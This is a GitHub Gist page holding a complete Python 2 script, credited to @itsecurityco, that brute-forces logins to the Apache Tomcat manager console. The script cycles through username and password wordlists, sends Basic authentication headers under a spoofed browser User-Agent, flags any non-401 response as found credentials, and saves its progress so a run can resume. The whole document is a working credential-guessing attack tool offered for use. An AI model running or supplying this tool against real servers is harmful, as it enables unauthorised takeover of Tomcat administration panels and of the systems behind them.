-
-
Save emadshanab/7bd493967b5f7578a10ef76d0b6d9e20 to your computer and use it in GitHub Desktop.
Tomcat manager console bruteforce
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Tomcat bruteforce | |
| Author: @itsecurityco | |
| """ | |
| import os | |
| import sys | |
| import getopt | |
| import base64 | |
| import requests | |
| from time import sleep | |
| def usage(): | |
| print "## Usage ##" | |
| print "tomcat.py --host 127.0.0.1 --port <8080> --path </manager/html> --usr path_file --pwd path_file" | |
| def info(host, port, path, usr_path, pwd_path): | |
| print "# Target: http://%s:%d%s" % (host, port, path) | |
| print "# Usernames: %s" % usr_path | |
| print "# Passwords: %s" % pwd_path | |
| raw_input("# Press any key to start ...") | |
| def log(log_file): | |
| if os.path.isfile(log_file): | |
| handle = open(log_file, "r") | |
| session = handle.read().strip().split("::::::") | |
| handle.close() | |
| os.remove(log_file) | |
| return session | |
| else: | |
| return False | |
| def bruteforce(host, port, path, usr_path, pwd_path, log_file): | |
| usernames = open(usr_path, 'r').read().splitlines() | |
| passwords = open(pwd_path, 'r').read().splitlines() | |
| headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Cache-Control": "max-age=0"} | |
| session = log(log_file) | |
| creds = {} | |
| for pwd in passwords: | |
| for usr in usernames: | |
| if session != False: | |
| if session[0] == usr and session[1] == pwd: | |
| print "# Reading %s file from '%s:%s' " % (log_file, usr, pwd) | |
| session = False | |
| sleep(5) | |
| else: | |
| continue | |
| headers["Authorization"] = "Basic %s" % base64.b64encode("%s:%s" % (usr, pwd)) | |
| print "[*] Trying '%s:%s' ..." % (usr, pwd) | |
| try: | |
| res = requests.get("http://%s:%d%s" % (host, port, path), headers=headers) | |
| if res.status_code != 401: | |
| print "[!] Credentials found: %s:%s" % (usr, pwd) | |
| creds[usr] = pwd | |
| except: | |
| handle = open(log_file, "w") | |
| handle.write("%s::::::%s" % (usr, pwd)) | |
| handle.close() | |
| if len(creds) > 0: | |
| print "## Summary ##" | |
| print creds | |
| else: | |
| print "## No passwords found ##" | |
| def main(): | |
| port = 8080 | |
| path = "/manager/html" | |
| log_file = "tomcat.log" | |
| try: | |
| opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "host=", "port=", "path=", "usr=", "pwd="]) | |
| except getopt.GetoptError as err: | |
| print str(err) | |
| usage() | |
| exit(1) | |
| for opt, arg in opts: | |
| if opt in ("-h", "--help"): | |
| usage() | |
| exit(0) | |
| elif opt == "--host": | |
| host = arg | |
| elif opt == "--port": | |
| port = int(arg) | |
| elif opt == "--path": | |
| path = arg | |
| elif opt == "--usr": | |
| usr_path = arg | |
| elif opt == "--pwd": | |
| pwd_path = arg | |
| else: | |
| assert False, "unhandled option" | |
| if len(opts) == 0: | |
| usage() | |
| exit(0) | |
| info(host, port, path, usr_path, pwd_path) | |
| bruteforce(host, port, path, usr_path, pwd_path, log_file) | |
| if __name__ == "__main__": | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment